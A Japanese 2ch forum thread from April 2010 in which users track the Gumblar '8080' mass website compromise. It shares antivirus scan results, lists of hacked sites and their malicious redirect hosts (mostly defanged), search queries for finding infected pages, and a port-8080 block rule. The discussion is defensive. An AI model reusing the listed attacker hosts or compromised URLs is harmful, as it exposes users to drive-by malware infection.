Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
GData 19 2010.04.06 JS:Illredir-AL
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AB
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB
http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270563154
File www.digital-as.co.jp.index.html received on 2010.04.06 14:12:34 (UTC)
Result: 11/39 (28.21%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
BitDefender 7.2 2010.04.06 Trojan.JS.Clicker.ABW
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.06 Trojan.JS.Clicker.ABW
GData 19 2010.04.06 Trojan.JS.Clicker.ABW
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AA
nProtect 2009.1.8.0 2010.04.06 Trojan.Script.397566
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB
0611名無しさん@お腹いっぱい。
2010/04/06(火) 23:25:29http://www.virustotal.com/analisis/9afe33fa08cea6979affa902512999d9df95078a07290cdef0aeda02b9b7370e-1270556815
File hoikuen.19th.org.html received on 2010.04.06 12:26:55 (UTC)
Result: 2/39 (5.13%)
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
NOD32 5003 2010.04.06 JS/TrojanDownloader.Pegel.AA
ソースだけにしたブツ
http://www.virustotal.com/analisis/5f943b2b2e48467b0a934a6eb5eac41319ed71c9fe3a5b71346cabfe2446dc1f-1270557088
File 19th.org.txt received on 2010.04.06 12:31:28 (UTC)
Result: 0/39 (0%)
0612名無しさん@お腹いっぱい。
2010/04/06(火) 23:34:57avast以外のフリー系には期待出来んな
0613名無しさん@お腹いっぱい。
2010/04/06(火) 23:39:46得手不得手があるよ
Gumblar.xだとAVGがよかったりする。
>>611はほぼ全滅なぬで国ドメイン(IPアドレス)変えただけでも脅威になるのね。。。
個人的にイパーイ検体出してるけどユーザーじゃないから届いてないかもしれにゃい。。。orz.....
0614名無しさん@お腹いっぱい。
2010/04/06(火) 23:47:08メールなら関係ないと思う
俺はユーザーだけどメールで検体出してるし、2回ほど返事が来たこともある
まぁavastはめったに返事来ないがな
0615名無しさん@お腹いっぱい。
2010/04/06(火) 23:47:23>2. 不正アクセスにより改ざんされた対象期間
2010年3月25日(木)6:00 〜 2010年4月5日(月)23:00
>>564 :コテハン ◆8080adndqg :2010/04 /05(月) 14:34:45
ここに投下されて凸られるまで「気づかなかった」としたら最悪だなwww
0616名無しさん@お腹いっぱい。
2010/04/06(火) 23:57:13AVGはツンデレ(死語)でねぇ、一度も返事がなかったんだけど
解パス間違えて送ったら、パス合わねぇーって返事北。
同時に出したかすぺはパス解読して対応の返事北。w
>>615
注意:醤油に反応する場合があります。
Last-Modified: Thu, 01 Apr 2010 13:17:22 GMT : ttp://megalodon.jp/2010-0405-1616-22/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fcompany%2Findex.html
多分気づかなかったんですね
0617名無しさん@お腹いっぱい。
2010/04/07(水) 00:04:581回は検体提出感謝の返事がスペルミス付きで来たw
1回は添付忘れて送ったら、4日後に「添付がねぇ」ってサポートからメール来た
0618名無しさん@お腹いっぱい。
2010/04/07(水) 00:08:09みんなやっちゃうなぁw
ここんとこパス合ってるけど圧縮ファイル名間違えて送ること数回。
顰蹙買い捲ってそうです><
0619名無しさん@お腹いっぱい。
2010/04/07(水) 10:19:02期間長っ! 終わってるな・・・
0620名無しさん@お腹いっぱい。
2010/04/07(水) 10:30:36スクリプトが検知できないから期待できないと言うのは早漏だろ。
スクリプトを踏んだ時点で検知できればそれに越したことはないが
肝心なのは現物がDLされる前に検知できるかであって
検知できれば結果は同じことだ。
その現物を持っていないから検知できるか知らんけどね。
0621名無しさん@お腹いっぱい。
2010/04/07(水) 14:23:39>>2はやってるはず。adobe readerは半年以上前にアンインストールしてある
0622コテハン ◆8080adndqg
2010/04/07(水) 14:29:24【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/ ←絶賛放置中
↓
hXXp://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
コードは>>598と同じなんだけど・・・
<!--562ba23ffcf28efa4f71fc787258d3d3-->
<!--e62178df1fa90a28d1b2efa8443ab220-->
謎の文字列が謎...
0623名無しさん@お腹いっぱい。
2010/04/07(水) 14:29:33心配ならOS入れなおし推奨
0624名無しさん@お腹いっぱい。
2010/04/07(水) 14:31:48「感染してるかもと思ったんならクリーンインストールしろ!」で終わりだから
実際それが一番確実だろうしな
0625名無しさん@お腹いっぱい。
2010/04/07(水) 14:32:37http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.jc-consulting.jp%2F&x=23&y=13
at:8080
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fnetnavi.boo.jp%2Fleopalace%2Flink%2F&x=55&y=12
やばいねー
0626名無しさん@お腹いっぱい。
2010/04/07(水) 14:36:570627コテハン ◆8080adndqg
2010/04/07(水) 14:49:44www●toutyann●com/
↓
hXXp://snoreflash●ru:8080/360-cn/google●com/thesun●co●uk●php
また重複しとる...
0628名無しさん@お腹いっぱい。
2010/04/07(水) 15:01:26いいんじゃね。
8080全弾きは誤爆するという奴もいるけど、そんな事例見たことないし。
0629コテハン ◆8080adndqg
2010/04/07(水) 15:03:56hXXp://helphomecare●at:8080/ultimate-guitar-com/google●com/livedoor●biz●php
at:8080/もでつか・・・ orz
>>626 *:8080/* ブロックでおk。
巻き込みで阻止られるサイトはURLが悪い(笑)
0630名無しさん@お腹いっぱい。
2010/04/07(水) 15:12:04ブロックを解除すればいいだけだしな。
0631名無しさん@お腹いっぱい。
2010/04/07(水) 16:37:19http://rd.or.tp/get.php?site=http%3A%2F%2Fwww.chanwoomul.net%2FNicecart4plus%2FShop%2FMember%2Fjoin_agree.html+&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none
> Found iFrame!
誤検出かな?
0632名無しさん@お腹いっぱい。
2010/04/07(水) 16:49:11上: 269, 270
下: 1053, 1054
にそれぞれ<iframe></iframe>があるぜぃ
0633名無しさん@お腹いっぱい。
2010/04/07(水) 16:52:31offにするにはwebGuardを無効にするしかない。i-frameに対する設定は出来る。
なんでもクリックするヤツには良いかもしれん。
0634名無しさん@お腹いっぱい。
2010/04/07(水) 17:48:38jde-net●co●jp センセイの診断結果
>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
センセイ激怒中w
>>633
なんでもかんでもクリッコするやつは
パソコンを使わない方がいいと思うw
0635名無しさん@お腹いっぱい。
2010/04/07(水) 17:58:48|http://*:8080*
でおk?
0636名無しさん@お腹いっぱい。
2010/04/07(水) 20:26:56ttp://www.aguse.jp/?m=w&url=www.footsal-club.net&x=30&y=19
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.unique-gifts-ideas.com%2Fcontact_us.html&x=39&y=16
阿斗ちゃん増殖中…
http://rd.or.tp/get.php?site=ayaka.echoll.net&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none
ここ出てたかな
0637名無しさん@お腹いっぱい。
2010/04/07(水) 20:35:09>>625でした・・・
0638コテハン ◆8080adndqg
2010/04/08(木) 04:45:37【陥落サイトのURL悪用厳禁】
fleur●webinfo●jp → loadtube●ru:
dog-g-club●com → helphomecare●at:
f39●aaa●livedoor●jp/~miyui/archives/cat3/cat10/index●html → helphomecare●at:
miyagi●007champagne●biz/asobo → youhelpnow●ru:
dxenglish●value-net●net/index●html → bestdarkstar●info:
--
発掘中にみつけた8080じゃないやつ
www●bestofunder●com/ ←アクセス注意
0639名無しさん@お腹いっぱい。
2010/04/08(木) 20:11:40moebox●com/main●html
たぶんもっと前から改ざんされてたとおもうけど一応貼っとく
Last-Modified: Sun, 04 Apr 2010 23:20:30 GMT
0640名無しさん@お腹いっぱい。
2010/04/08(木) 20:15:26.irってイランか
初めて見たわ
0641名無しさん@お腹いっぱい。
2010/04/08(木) 20:20:54aguseのソースをまとめてDLしてくれるの便利だね
/js/table.js や /js/lk.js にてんこ盛りされてて吹いた
0642名無しさん@お腹いっぱい。
2010/04/08(木) 20:24:58同じURLが連続してるとこから手動ではなく自動っぽいことが伺える
まあLast-Modified: も近い時間になってるしね
0643名無しさん@お腹いっぱい。
2010/04/09(金) 00:29:25注意のURLを踏んでしまったOTZ
とあるインドの”コンピューターの危険にさらされる”サイトに飛ばされた
ちょうしこいて踏むんじゃなかったぉ・・・
0644名無しさん@お腹いっぱい。
2010/04/09(金) 00:43:16↓2ヶ所に飛ばされる
zeneey●com/email/znystyle.phpとzeneey●com/は踏んでしまったOTZ
nt01●co●in/3 はセクルチーが防いで踏まずに済んだみたい…
zeneey●com/は感染サイトだから、今月中にOSの再インストールするぉ!
0645名無しさん@お腹いっぱい。
2010/04/09(金) 15:42:26> <!--562ba23ffcf28efa4f71fc787258d3d3-->
> <!--e62178df1fa90a28d1b2efa8443ab220-->
> 謎の文字列が謎...
この文字列が有る無しでもセキュリティベンダーによっては検出しない場合があるね。
つか、avast!対応早杉、頑張り過ぎだろw
0646名無しさん@お腹いっぱい。
2010/04/09(金) 16:56:34http://www.virustotal.com/jp/analisis/576625dfc92ddec9c083a0be35955bcbbb2ccc00e8fa10529593b1d9fd66fa45-1270798218
http://www.virustotal.com/jp/analisis/64e5f4361d53c04a3507ccd0f5fa26f825334712f067cb1ca13a0752d5004cf6-1270798308
http://www.virustotal.com/jp/analisis/196b6cc52572a0df14fa9464d23791ae672ff96a7d193d232e4391d290b6a030-1270798380
http://www.virustotal.com/jp/analisis/bf1442e8539eff69b8cc1030558336386fe37ced27486f4781d1ac13cfb99606-1270798440
http://www.virustotal.com/jp/analisis/a8b209ae2b1c3763d0a2c594f707dc508e37321bd243b9e6651c541ca97d84c1-1270798557
http://www.virustotal.com/jp/analisis/c8cdcb6c4c477d5003838dfebc02a83c5988514cc043069d8358b5b5dee17dbc-1270798655
http://www.virustotal.com/jp/analisis/5a293d97eb69fc9b774679863c8702048de6d6f3b5fc701ae81b3309181fde3b-1270798725
http://www.virustotal.com/jp/analisis/aef4d81b737da5ed04e1baf7055584392e6e5bb9cbcda7003feb6463199e5c32-1270798795
http://www.virustotal.com/jp/analisis/ea69840abf9a2e9d0614bfae8968951493ad27439900fb4d4742422d069d5abb-1270798870
http://www.virustotal.com/jp/analisis/f972bd8e899ff3faf7d96441af889eb3382705badca99ebe6b96b2405b5102b7-1270799054
http://www.virustotal.com/jp/analisis/2368c9df63ed57807419bc6bd8549a8a4c8d5d7da87a0e823f30a7406da595df-1270799145
http://www.virustotal.com/jp/analisis/7688fcc5d7ff528a345f2fed476550887b3d979791431436a861b585c5ed91c9-1270799251
http://www.virustotal.com/jp/analisis/a5dce97142a62462733d934cb253aea387371ce9356f7b6a14ac135b72ca7ce8-1270799355
きゅ〜い!きゅ〜い!(キリッ
0647コテハン ◆8080adndqg
2010/04/09(金) 18:05:56www●ferahdondurma●com ← アクセス注意!
※改竄されすぎててよくわからんw
neta-script●lionking●jp/ (.at:8080/)
8080系のスクリプトが最大の仕込み?
携帯オンリーで掘るのは厳しいゾ・・・とw
0648名無しさん@お腹いっぱい。
2010/04/09(金) 18:28:30VTのスキャン結果でカスペがスルーして「ウイルス検出できない!カスペオワタ!」
って言われるのはカスペ信者としては見過ごせないのだが。
0649名無しさん@お腹いっぱい。
2010/04/09(金) 19:58:330650名無しさん@お腹いっぱい。
2010/04/09(金) 20:26:57だれうまw
www●e-tokunaga●co●jp/contents/house_dock/index●html
www●vericapandilovska●com●mk/
this●is/ausgot/
at:8080
capvex●com
egujarat●net
info:8080
reagold●com
カスペに蹴られた…ウイルスか?
0651コテハン ◆8080adndqg
2010/04/09(金) 20:43:45>reagold●com
色々仕込んであるというか・・・元のページの面影が無いw
・<!-- ad -->
・Gumblarっぽいやつ
・var I={j・・・
・var Il1I1111I1=function
0652名無しさん@お腹いっぱい。
2010/04/09(金) 20:57:460653名無しさん@お腹いっぱい。
2010/04/09(金) 21:20:17LACCOTV: 「Gumblarの脅威!新たな危険挙動を追跡中!」
http://www.youtube.com/user/laccotv#p/u/0/R1t4QPIRzsg
0654名無しさん@お腹いっぱい。
2010/04/10(土) 02:13:31> bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか?
JREのアップデート通知でしょ。
Java 新版登場。27 種類の欠陥が修正されている。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/04.html#20100401_Oracle
0655名無しさん@お腹いっぱい。
2010/04/10(土) 02:24:410656名無しさん@お腹いっぱい。
2010/04/10(土) 05:48:47見たいサイトがあってグーグルのキャッシュというところをおして見ようとしたら
avastに警告され、キャッシュのURLを入れてチェッカーに掛けたら
外部へリダイレクトされていますと赤字で出ましたが
マルウェアが検出されないと出ます。
これってウイルスサイトではないってことですか?
0657名無しさん@お腹いっぱい。
2010/04/10(土) 05:50:030658名無しさん@お腹いっぱい。
2010/04/10(土) 07:44:59仮想マシン一台作って見にいってみたけど
403エラーで何も見れません。
心配なら、OSの再インストールを勧めます。
0659名無しさん@お腹いっぱい。
2010/04/10(土) 07:46:34今はアクセスできない
キャッシュは感染してる
0660名無しさん@お腹いっぱい。
2010/04/10(土) 09:35:40なんかウィルスバスター起動しなくて、、、
0661名無しさん@お腹いっぱい。
2010/04/10(土) 10:14:53www●geocities●jp/o_tweb/
www●geocities●jp/shimilw/
0662名無しさん@お腹いっぱい。
2010/04/10(土) 10:17:36懐かしのCODE1
0663名無しさん@お腹いっぱい。
2010/04/10(土) 10:18:27>>659
ありがとうございました。感染してたur-chintai.●infoはなくなったのに
キャッシュで感染するんですね・・・
avastでHDD検査して一応ウイルスなかったのですが
カスペでもやって見つかったら再インストールします・・・
0664名無しさん@お腹いっぱい。
2010/04/10(土) 10:19:48avastが防いでくれたから問題ないだろ
0665名無しさん@お腹いっぱい。
2010/04/10(土) 10:42:060666名無しさん@お腹いっぱい。
2010/04/10(土) 11:00:03www●tirashi●jp/ ここも全然対処しない
0667名無しさん@お腹いっぱい。
2010/04/10(土) 11:11:090668名無しさん@お腹いっぱい。
2010/04/10(土) 11:12:020669名無しさん@お腹いっぱい。
2010/04/10(土) 12:22:19partsdepot●jp/
0670名無しさん@お腹いっぱい。
2010/04/10(土) 13:52:37www●gozaisho.co●jp
右下に「やんちゃ爆弾」てのが出ていて、難読化されています。
ググってみたら、やんちゃ爆弾自体はブログパーツのようなんですが、
ロープウェイの公式サイトにこんなオモチャを仕掛けるって、普通の企業なら
あり得ないと思うのですが。
そもそも、難読化する必要性がないですよね。他の部分は普通に読める
アドレスで貼ってあるのに、openの部分のみ。
既存のものを利用した新たな改竄ってことはないですか?
それともこれが普通の形態?
考えてみたら、ブログパーツ部分に仕掛けられたら、危険性認識せずに
押してしまう人はたくさんいそうだ。。
0671名無しさん@お腹いっぱい。
2010/04/10(土) 14:16:56解読結果
* *
* うそです +
n ∧_∧ n
+ (ヨ(* ´∀`)E)
Y Y *
wwwwww
0672名無しさん@お腹いっぱい。
2010/04/10(土) 14:31:47無理
セキュリティソフトが起動しない時点でいろいろやられてるってことです
OS入れなおしましょう
0673名無しさん@お腹いっぱい。
2010/04/10(土) 14:35:08キャッシュなら安全とおもうほうがおかしいよ
単純に考えてコードをそのまま保存するんだから攻撃スクリプトも保存されるでしょ
0674名無しさん@お腹いっぱい。
2010/04/10(土) 15:05:31http://gimpo.2ch.net/test/read.cgi/nendai/1269784099/
0675名無しさん@お腹いっぱい。
2010/04/10(土) 15:41:51マルチ死ね
0676名無しさん@お腹いっぱい。
2010/04/10(土) 15:47:050677名無しさん@お腹いっぱい。
2010/04/10(土) 16:28:000678名無しさん@お腹いっぱい。
2010/04/10(土) 16:50:37Internet Explorer で ActiveX コントロールの動作を停止する方法
http://support.microsoft.com/kb/240797
Java Runtime Environment
http://this.is/ausgot/?id=forum/serious-new-java-flaw-affects-all-browsers-040910
0679名無しさん@お腹いっぱい。
2010/04/10(土) 16:59:160680650
2010/04/10(土) 17:09:46俺の貼った陥落サイトのURL使ってんじゃねーよクソが
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fthis.is%2Fausgot%2F%3Fid%3Dforum%2Fserious-new-java-flaw-affects-all-browsers-040910+&x=55&y=13
0681名無しさん@お腹いっぱい。
2010/04/10(土) 17:17:18管理者氏名がパッと見Gumblarに見えたwww
0682コテハン ◆8080adndqg
2010/04/10(土) 18:23:06ここは鑑定スレではありませぬ。
>>678
下段のURLは8080系の陥落サイト。
easyfunguide●at:8080/
「陥落サイトが増える(かもしれない)」から
遊びで貼るのはやめましょう。
0683名無しさん@お腹いっぱい。
2010/04/10(土) 23:49:47JS:Illredir-AQ(=8080)の増え方が激しい…本日の検出数は上から5番目
盛大に拡散中ですなwww
0684名無しさん@お腹いっぱい。
2010/04/11(日) 02:57:32消すのメンドイ
0685コテハン ◆8080adndqg
2010/04/11(日) 03:39:09jyo●eisuku●com/home/
adgaw●com/lovesheet/index●html
www●borneomarathon●com/jpn/home●html ←旧型
けんさくわーど:"new String();" "new Date();" "new Array();" -JAVA -JAVAScript
site:jp の検索結果 約 160 件
site:cn の検索結果 約 490 件
site:ru の検索結果 約 1,860 件 ←www
0686名無しさん@お腹いっぱい。
2010/04/11(日) 03:46:13セキュリティベンダーに就職しろwww
0687名無しさん@お腹いっぱい。
2010/04/11(日) 06:22:17トップはメンテ中になってるが他のページがネット上に残ったまま
www■tirashi■jp/tmp/flyer_zooma/ZcyyxafVGp_129/
0688名無しさん@お腹いっぱい。
2010/04/11(日) 07:05:13書き込みに失敗しているところが掛ったと思ったら
www■niaufuku■com/index■htm
他のページは成功してるらしい。
bag■fukunekodo■com/mindex/ 携帯向けのサイト
と思ったらfukunekodo■com/ 上にあるサイトが全部やられてるっぽい
wagashi■fukunekodo■com/index/
shochu■fukunekodo■com/index/
nihonshu■fukunekodo■com/index/
sweet■fukunekodo■com/index/
cosme■fukunekodo■com/index/
make■fukunekodo■com/index/
car■fukunekodo■com/index/
mens■fukunekodo■com/index/
pc■fukunekodo■com/index/
baby■fukunekodo■com/index/
diet■fukunekodo■com/index/ たぶん他にもあると思う
失敗?
inner■fukunekodo■com/index/
fashion■fukunekodo■com/index/
acces■fukunekodo■com/index/
golf■fukunekodo■com/index/
meet■fukunekodo■com/index/
bekkan■fukunekodo■com/index/
どっちもru:8080
0689名無しさん@お腹いっぱい。
2010/04/11(日) 09:10:08ホームページ制作会社
Collco - 株式会社コルコ
ttp://www●collco●jp/works/index.html
↑
ttp://www.virustotal.com/jp/analisis/5b775a22571016560950fe2bd81349e73163483a3e199beb7292c32612555b37-1270944263
世もまつだww
0690名無しさん@お腹いっぱい。
2010/04/11(日) 09:13:540691名無しさん@お腹いっぱい。
2010/04/11(日) 10:18:20世も末(すえ)な
日本語は正しく使いましょう
0692名無しさん@お腹いっぱい。
2010/04/11(日) 10:29:280693名無しさん@お腹いっぱい。
2010/04/11(日) 11:17:06絞り込んでみた
ttp://search●yahoo●co●jp/search?p=site%3Afukunekodo●com%2F+%22function%22&ei=UTF-8&fr=top_ga1_sa&x=wrt
検索結果 約193件(多少の巻き込み有)
>>689
www●collco●jp/
↓巻き込み改竄↓
www●kyoudoumusen●jp/
/(^o^)\やっちまった
・・・ということだなw
0694名無しさん@お腹いっぱい。
2010/04/11(日) 11:33:44fukunekodoひどいな
コルコはorz×100000000000
0695650
2010/04/11(日) 11:52:00ちょっと気になったので賢明な諸兄の判断を仰ぎたく・・・
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.aparajeyo.org%2Findex.php&x=53&y=7
> www●saidenterprise●com:2095/login/
ウイルスかな?
違ってたらすまない、本当に少し気になっただけなんだ
0696名無しさん@お腹いっぱい。
2010/04/11(日) 12:24:52www●aparajeyo●org/index●php
avastが反応、JS:Illredir-AL
絶賛崩壊中w
ソース見た限りでは.ru:8080だな
下のアドレスはどこから?
0697696
2010/04/11(日) 12:27:40Web Mailって書いてあるから、ポート2095はたぶん関係ないと思う
0699コテハン ◆8080adndqg
2010/04/11(日) 13:50:02www●nadara●jp ←途中で切れてる
npo-aichi●or●jp/ ← \(^o^)/
creole●jp/
kumarin●biz/
0700696
2010/04/11(日) 14:19:244発(本文3発.js1発)仕込みwww
しかし何で途中で切れたりするんだろ
0701650
2010/04/11(日) 14:51:08hrhr●sakura●ne●jp ←ブログ?
>>700
それはいつも思う、どうしてだろうね?
0702名無しさん@お腹いっぱい。
2010/04/11(日) 14:57:58今頃気が付いたw
名無しさんに戻りますね
0703名無しさん@お腹いっぱい。
2010/04/11(日) 16:57:31現実逃避?
0704名無しさん@お腹いっぱい。
2010/04/11(日) 16:58:08そういえば、cmsツールの脆弱性とか聞いた覚えがあったw
0705名無しさん@お腹いっぱい。
2010/04/11(日) 18:06:18Googleにリダイレクト
77●221●153●178/go2/in●phpの代替かも…よく判らない
>>703
対策取っとけば怖くない現実に辿り着いたんだよきっとw
誰も感染しなくなって、ガンブラーが廃れて、このスレも要らなくなる
それが何より望ましい事なんだからそれはそれで良い結末だけどね
>>704
これ以降の話?
ttp://www.itmedia.co.jp/enterprise/articles/1004/08/news068.html
0706名無しさん@お腹いっぱい。
2010/04/11(日) 18:40:42前にHP作成会社に聞いた話で
複数のHPを管理していて改竄されたのが一つだけ
自動更新するソフトを使ってるHPだけが改竄されたとか
IPAと警察庁に報告する様お願いしたけど
んで、今日同じ様な話しを聞いて思い出したw
0707名無しさん@お腹いっぱい。
2010/04/11(日) 21:17:09対策や予防方法が広く認知されるようになったからだろう。
わかっていても検証コスト等の理由で後手に回っているサーバの改ざんは広がっていても
閲覧するだけの個人ユーザに被害が及ばなくなれば話題としては収束するさ。
0708コテハン ◆8080adndqg
2010/04/11(日) 21:41:42npo-aichiはサイト内全滅でござる
/content/include/xoops●js
/content/modules/xhld0/phpdate●js
/content/modules/xhld1/phpdate●js
/content/modules/xhld2/phpdate●js
/content/modules/xhld3/phpdate●js
jsも全滅w
0709名無しさん@お腹いっぱい。
2010/04/11(日) 22:36:120710名無しさん@お腹いっぱい。
2010/04/12(月) 00:44:35感染を広げる一因にもなってるんじゃねw
0711名無しさん@お腹いっぱい。
2010/04/12(月) 00:45:380712名無しさん@お腹いっぱい。
2010/04/12(月) 01:40:06おまい頭いいなwww
0713名無しさん@お腹いっぱい。
2010/04/12(月) 01:58:58こんな感じかな?
http:%2F%2Fwww.jc-consulting.jp%2F
http:%2F%2Fwww.amakusaturigu.com%2Fhtml%2F
http:%2F%2Fwww.niaufuku.com%2Findex.htm
ちなみに踏んでも無害だから安心しる!
0714名無しさん@お腹いっぱい。
2010/04/12(月) 02:14:06こゆのはどないだ?(苦笑
687474703a2f2f7777772e6a632d636f6e73756c74696e672e6a702f
687474703a2f2f7777772e616d616b7573617475726967752e636f6d2f68746d6c2f0d0a
687474703a2f2f7777772e6e69617566756b752e636f6d2f696e6465782e68746d0d0a
0715名無しさん@お腹いっぱい。
2010/04/12(月) 02:18:34aHR0cDovL3d3dy5leGFtcGxlLmNvbS8K
aHR0cDovL3d3dy4yY2gubmV0Lwo=
aHR0cDovL3BjMTEuMmNoLm5ldC90ZXN0L3JlYWQuY2dpL3NlYy8xMjY4MDU5Njg0Lwo=
0716名無しさん@お腹いっぱい。
2010/04/12(月) 02:21:050717名無しさん@お腹いっぱい。
2010/04/12(月) 02:26:45>>715 はっぱ案
0718コテハン ◆8080adndqg
2010/04/12(月) 12:46:01こうすれば良いんだな?
0719コテハン ◆8080adndqg
2010/04/12(月) 13:05:16発掘されやすいから %68%74%74%70%3a%2f%2f こうしたのかな?
↓
ttp://search●yahoo●co●jp/search?p=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=
0720名無しさん@お腹いっぱい。
2010/04/12(月) 15:15:31ここって1回閉鎖したんじゃなかった?
0721名無しさん@お腹いっぱい。
2010/04/12(月) 15:26:51nodさんが反応しました
0722名無しさん@お腹いっぱい。
2010/04/12(月) 15:30:560723名無しさん@お腹いっぱい。
2010/04/12(月) 16:48:30みんなに知らせるって意味じゃ難読化してちゃ意味ないんだよな
0724名無しさん@お腹いっぱい。
2010/04/12(月) 17:34:40俺は2chに貼ってあるURLは全てgredとaguseでチェックしてるけど
0725名無しさん@お腹いっぱい。
2010/04/12(月) 18:14:28グロでもウイルスでも2chじゃ無用心に踏む方も悪い
グロ踏んで学習するかウイルス踏んで学習するかの違いだろう
貼るバカを肯定するわけじゃないけどな
0726名無しさん@お腹いっぱい。
2010/04/12(月) 18:52:36不特定多数の人間がいる場所では常に用心はすべきだというのは紛れもない事実だけどね
0727名無しさん@お腹いっぱい。
2010/04/12(月) 19:04:59※貼られたURLが安全だということは保障できません 踏む前に必ずブラクラチェック等行いましょう※
くらい入れてもいい気はする
0728名無しさん@お腹いっぱい。
2010/04/12(月) 19:08:280729名無しさん@お腹いっぱい。
2010/04/12(月) 19:14:530730名無しさん@お腹いっぱい。
2010/04/12(月) 19:19:300731名無しさん@お腹いっぱい。
2010/04/12(月) 19:21:38Dr.WEB リンクチェッカー
http://drweb.jp/support/link_checker.html
0732名無しさん@お腹いっぱい。
2010/04/12(月) 19:28:42Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
Gumblar/8080 Checker=http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/$TEXT$LINK
0733オルティス・ジャパン
2010/04/12(月) 22:02:43コルコの方、こっそり修正している様ですが
告知はまだですか?
先程は検討をしてると言っていましたね
未だに告知をしていない様ですが…
それとね、貴方達は修正したつもりなのでしょうけど
リダイレクターはまだ残っているのです
改竄は完全には修正されてはいないのです
他の方からメールで教えて貰った事を全て完全に実行しなさい
>>584を心に刻み、心を入れ替えなさい
真摯な姿勢こそが大切だとは思わないのですか
0734名無しさん@お腹いっぱい。
2010/04/12(月) 22:22:17せめて安価は>>606にw
> リダイレクター
確認すた。。。。
0735名無しさん@お腹いっぱい。
2010/04/12(月) 22:59:27http://www.ipa.go.jp/security/txt/2010/04outline.html
> ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
> ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
> ・ 改ざんの事実の説明
> ・ 改ざんされていた箇所
> ・ 改ざんされていた期間
> ・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
> ・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
> ・ 問い合わせ用窓口の連絡先
0736名無しさん@お腹いっぱい。
2010/04/13(火) 00:56:13それについてはエヌピーオー愛知ネットも気になるね
昨日、NPO-AICHIの登録担当と技術担当、倉敷CATVの技術担当のメアドに
aguseの調査結果を送ってさしあげたら何の説明もなしに閉鎖してたさ
"災害時の確実な情報伝達を目的とするNPO法人"とか何のジョークだよw
0737名無しさん@お腹いっぱい。
2010/04/13(火) 00:58:03役に立たない鳩耳に密告しておくか・・・・
0738名無しさん@お腹いっぱい。
2010/04/13(火) 01:07:55イ牛のNPOからスクリプトは除去したってメルきたお。
その時点ではスクリプトはなくなってた。
IPAに被害報告してってことと>>735のこと書いて返信したら403になった。
思案中かも。
0739名無しさん@お腹いっぱい。
2010/04/13(火) 01:13:03おやそうでしたか、それは失礼しました…
0740名無しさん@お腹いっぱい。
2010/04/13(火) 01:40:20ttp://www.google.com/url?q=http%3A%2F%2Fonline%2Eus%2Edrweb%2Ecom%2Fresult%2F%3Furl%3Dhttp%253A%252F%252Fwww%252Ecollco%252Ejp%252Finquiry%252Findex%252Ephp
0741名無しさん@お腹いっぱい。
2010/04/13(火) 03:19:58javaws.exeをHIPS等で無効化
Firefoxだったら、Java Deployment Toolkitプラグインを無効化
とかでいいのかな?
どうも情報が少なくてよくわからない。
0742名無しさん@お腹いっぱい。
2010/04/13(火) 03:57:50ttp://japan.cnet.com/news/sec/story/0,2000056024,20411906,00.htm
> Ormandy氏がこの脆弱性についてSun Microsystemsに連絡したと
>ころ、四半期ごとの通常の修正パッチ公開スケジュール外でパッチを
>公開するほど緊急度が高いとは考えていない、との返事だったという。
またしばらく放置される訳ですね、わかります。Sunはマジで死ね。
0743名無しさん@お腹いっぱい。
2010/04/13(火) 04:05:32倉敷CATVも感染してたのか・・・実家の地元局でケーブル引いてるだけになんか凄い残念だな
0744名無しさん@お腹いっぱい。
2010/04/13(火) 04:06:28指摘されないとわからないバカの集団らしいなw
/inquiry
<!--トロイを絶賛配布中!(無料)-->
↑追記しておけwwwww
0745名無しさん@お腹いっぱい。
2010/04/13(火) 04:14:14whoisかaguse見れ
魚青 211.125.125.234の管理
0746741
2010/04/13(火) 04:22:51とりあえずHIPSを使うまでもなく、NTFSのアクセス権設定でjavaws.exe(C:\Program Files\
Java\jre6\binとC:\WINDOWS\system32の二つある、よくわからないのでとりあえず両方)の
読み取りと実行を拒否した状態で、以下テストページでjavaws.exeが実行されないことを確認。
